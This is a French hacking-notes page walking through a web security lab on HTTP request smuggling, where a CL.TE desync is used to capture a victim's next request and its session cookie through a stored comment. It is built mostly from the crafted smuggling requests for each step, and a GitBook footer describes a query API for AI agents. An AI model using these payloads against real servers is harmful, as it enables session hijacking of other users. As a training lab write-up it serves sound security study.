> For the complete documentation index, see [llms.txt](https://hacking-notes.jord4n.pro/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://hacking-notes.jord4n.pro/fr/web/request-smuggling/capturing-other-users-requests.md).

# Capturer les requêtes d'autres utilisateurs

### Exploitation du HTTP Request Smuggling pour capturer les requêtes des autres utilisateurs

Le laboratoire met en place un serveur front-end et un serveur back-end. Le front-end **ne prend pas en charge l'encodage chunked**. / L'objectif est de **faire passer clandestinement** une requête vers le back-end afin que **la requête du prochain utilisateur** est **stockée par l'application**. / Puis, **récupérer cette requête** et utiliser les **cookies de la victime** pour accéder à son compte.

Le laboratoire simule un utilisateur victime : après les quelques requêtes POST envoyées, la victime exécute sa propre requête. / Parfois, il est nécessaire de répéter l'attaque plusieurs fois.

> Bien que le laboratoire autorise HTTP/2, la solution doit utiliser **HTTP/1** car certaines techniques ne sont possibles que dans ce protocole. " " Le front-end interprète **Content-Length**, tandis que le back-end traite **Transfer-Encoding: chunked**, créant un décalage exploitable. " " L'extension Burp HTTP Request Smuggler peut aider à corriger manuellement les longueurs.

#### 1. **Requête interprétée par le front-end**

Le front-end lit `Content-Length: 13`, puis voit également `Transfer-Encoding: chunked`:

```http
Content-Type: application/x-www-form-urlencoded
Content-Length: 13
Transfer-Encoding: chunked

0

postId=6
```

Après la fin du bloc (`0`), une requête back-end supplémentaire est ajoutée.

<figure><img src="/files/879cbc18b78eb0a43e9dc4c50f6472a26427adcc" alt=""><figcaption></figcaption></figure>

#### 2. **Injection d'une requête POST pour publier un commentaire**

Vous construisez une requête dissimulée contenant une deuxième requête complète :

```http
POST / HTTP/1.1
Host: 0a36007e032121be824c43d100150069.web-security-academy.net
Content-Type: application/x-www-form-urlencoded
Content-Length: 285
Transfer-Encoding: chunked

0

postId=6
POST /post/comment HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Cookie: session=jjCIZY2wVTQVhJ6tfWqnEV3pftTw4Rus
Content-Length: 130
csrf=MWV1glEz7sP3FB0WKoGENl7Jk7EvMoqA&postId=6&comment=test&name=test&email=test%40test.com&website=http%3A%2F%2Ftest.com
```

Résultat : / La requête dissimulée est traitée comme si elle provenait de votre propre session, et l'application publie le commentaire.

<figure><img src="/files/569a95a602276c2a7c3676542abe0361060f4577" alt=""><figcaption></figcaption></figure>

#### 3. **Forcer la victime à publier un commentaire**

Vous modifiez le corps en :

{% code overflow="wrap" %}

```http
csrf=MWV1glEz7sP3FB0WKoGENl7Jk7EvMoqA&postId=6&comment=HackedByJordan&name=test&email=test%40test.com&website=http%3A%2F%2Ftest.com
```

{% endcode %}

```http
POST / HTTP/1.1
Host: 0a36007e032121be824c43d100150069.web-security-academy.net
Content-Type: application/x-www-form-urlencoded
Content-Length: 287
Transfer-Encoding: chunked

0

POST /post/comment HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Cookie: session=jjCIZY2wVTQVhJ6tfWqnEV3pftTw4Rus
Content-Length: 134

csrf=MWV1glEz7sP3FB0WKoGENl7Jk7EvMoqA&postId=7&comment=HackedByJordan&name=test&email=test%40test.com&website=http%3A%2F%2Ftest.com
```

et envoyez une requête similaire. / Lors du rechargement, l'application affiche **Merci pour votre commentaire**, indiquant que la victime a publié ce commentaire.

<figure><img src="/files/78c6b48b77dd75b739f33eb05f9695b341d12f27" alt=""><figcaption></figcaption></figure>

<figure><img src="/files/d8d4cb60c9e4989327ef105fd69df6693b724cf7" alt=""><figcaption></figcaption></figure>

#### 4. **Préparer la capture de la requête de la victime**

Pour capturer l'intégralité de la requête de l'utilisateur victime, vous augmentez considérablement le `Content-Length` afin que le back-end consomme la requête suivante comme contenu :

```http
Content-Length: 1000

csrf=MWV1glEz7sP3FB0WKoGENl7Jk7EvMoqA&postId=4&name=test&email=test%40test.com&website=http%3A%2F%2Ftest.com&comment=HACKED
```

La requête suivante envoyée par la victime est alors absorbée dans le corps attendu... / et devient **consultable dans le stockage de l'application**.

<figure><img src="/files/59669b16280d262594c7b1255991270a8e609d38" alt=""><figcaption></figcaption></figure>


---

# Agent Instructions
This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com.

## Querying This Documentation
If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter, and the optional `goal` query parameter:

```
GET https://hacking-notes.jord4n.pro/fr/web/request-smuggling/capturing-other-users-requests.md?ask=<question>&goal=<endgoal>
```

`ask` is the immediate question: it should be specific, self-contained, and written in natural language.
`goal` is optional and describes the broader end goal you are ultimately trying to accomplish on behalf of the user. GitBook uses it to tailor the answer towards what is most useful for that goal.

The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.
